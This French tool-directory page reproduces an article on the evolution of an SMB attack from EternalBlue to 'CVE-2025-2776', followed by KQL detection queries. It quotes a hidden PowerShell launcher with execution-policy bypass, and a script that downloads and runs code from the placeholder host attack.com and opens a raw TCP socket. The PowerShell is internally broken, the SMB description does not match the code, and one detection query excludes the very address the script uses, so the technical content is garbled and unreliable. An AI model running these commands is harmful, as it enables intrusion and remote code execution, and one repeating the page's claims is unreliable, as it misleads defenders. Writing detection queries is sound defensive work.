Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
From-EternalBlue-to-CVE-2025-2776-The-Evolution-of-an-SMB-Attack — Elle a ébranlé le monde en 2017 et a évolué pour devenir le CVE‑2025‑2776 d'aujourd'hui. Microsoft s'appuie toujours sur SMBv1, cet article expliquera comment les attaquants ont modifié la chaîne, passant d'une simple DLL à une pile complète de reverse shell, et ce que cela signifie pour les défenseurs. | Kitploit
Outils/GitHubGitHub/mrk336/from-eternalblue-to-cve-2025-2776-the-evolution-of-an-smb-attack
Analyse des VulnérabilitésExploitationAnalyse de MalwareTests d'IntrusionRenseignement sur les MenacesApprentissage et ÉducationRéponse aux Incidents
GitHubmrk336/from-eternalblue-to-cve-2025-2776-the-evolution-of-an-smb-attack

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →

From-EternalBlue-to-CVE-2025-2776-The-Evolution-of-an-SMB-Attack

Voir le dépôt
il y a 11 moisPas encore vérifié

À propos

Elle a ébranlé le monde en 2017 et a évolué pour devenir le CVE‑2025‑2776 d'aujourd'hui. Microsoft s'appuie toujours sur SMBv1, cet article expliquera comment les attaquants ont modifié la chaîne, passant d'une simple DLL à une pile complète de reverse shell, et ce que cela signifie pour les défenseurs.

Partager

De l'EternalBlue à la CVE-2025-2776 : l'évolution d'une attaque SMB

Il a ébranlé le monde en 2017 et a évolué vers la CVE‑2025‑2776 d'aujourd'hui. Microsoft s'appuie toujours sur SMBv1 ; cet article expliquera comment les attaquants ont modifié la chaîne, d'une simple DLL à une pile complète de reverse shell, et ce que cela signifie pour les défenseurs.

Un bref retour historique

Lorsque WannaCrypter a utilisé EternalBlue en 2017, la faille était un bogue classique d'exécution de code à distance qui permettait à un attaquant malveillant d'envoyer un paquet à un hôte Windows via SMBv1. La charge utile créait un exécutable qui lançait un nouveau processus et ouvrait un port d'écoute sur la même machine ; de là, l'attaquant pouvait pivoter vers l'extérieur ou exfiltrer des données vers un serveur distant. Le code d'EternalBlue était court, mais il avait quelques effets secondaires difficiles à suivre : le paquet SMB avait une disposition d'en-tête inhabituelle, et le noyau Windows déposait la charge utile en mémoire avant de l'écrire sur le disque.

Avançons rapidement jusqu'en 2025 : la nouvelle CVE‑2025‑2776 reprend la même idée et lui ajoute une couche de complexité supplémentaire. Au lieu de simplement ouvrir un port, l'attaquant écrit désormais un reverse shell directement dans la pile réseau. Cela signifie que vous pouvez voir une session SMB complète provenant de l'appareil Pi dans les journaux, et que vous disposez d'un nouvel indicateur (le nom du processus et l'adresse IP) à surveiller.

**Le code qui fait tourner la machine **

Vous trouverez ci-dessous le JavaScript qui se trouve dans la pièce jointe PDF et qui déclenche toute la chaîne :

root@kitploit:~
var cmd = "powershell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -File C:\\Users\\Admin\\script.ps1";
WshShell.Sleep(500);
var sh = WshShell.Exec(cmd);
while (!sh.StdOut.EndOfStream) {
  var line = sh.StdOut.ReadLine();
  WScript.Echo(line);
}

Lorsque le script se termine, il crée un fichier nommé script.ps1 sur l'hôte cible. Le script PowerShell lui-même ressemble à ceci :

root@kitploit:~
Invoke-Expression (New-Object System.Net.WebClient).DownloadString('https://attack.com/shell.exe')
$client = New-Object System.Net.Sockets.TcpClient
$client.Connect('10.0.1.5', 445)
$stream = $client.GetStream()
$payload = Get-Content -Path C:\\Users\\Admin\\script.ps1 | Out-File -Encoding binary
$stream.Write($payload, 0, $payload.Length)

Stratégie de détection KQL pour la CVE-2025-2776

Exécution PowerShell suspecte

Détecte la création de script.ps1 dans les répertoires utilisateur.

root@kitploit:~
DeviceProcessEvents
| where FileName == "powershell.exe"
| where ProcessCommandLine has_all ("-ExecutionPolicy", "Bypass", "-NoProfile")
| where ProcessCommandLine has "script.ps1"
| project Timestamp, DeviceName, InitiatingProcessFileName, ProcessCommandLine, AccountName

Connexion SMB sortante vers une IP inhabituelle

Signale le trafic SMB sortant vers des IP internes non standard.

root@kitploit:~
DeviceNetworkEvents
| where RemotePort == 445
| where RemoteIP !startswith "192.168." and RemoteIP !startswith "10."
| where InitiatingProcessFileName == "powershell.exe"
| project Timestamp, DeviceName, RemoteIP, InitiatingProcessFileName, InitiatingProcessCommandLine

Comportement de reverse shell via TCPClient

Recherche PowerShell utilisant les classes .NET pour initier un comportement de reverse shell.

root@kitploit:~
DeviceProcessEvents
| where FileName == "powershell.exe"
| where ProcessCommandLine has "System.Net.Sockets.TcpClient"
| project Timestamp, DeviceName, ProcessCommandLine, AccountName

Activité d'écriture de flux réseau

Détection avancée si la télémétrie inclut l'activité de flux .NET.

root@kitploit:~
DeviceProcessEvents
| where ProcessCommandLine has "GetStream" and ProcessCommandLine has "Write"
| where ProcessCommandLine has "script.ps1"
| project Timestamp, DeviceName, ProcessCommandLine, AccountName
Télécharger l’outil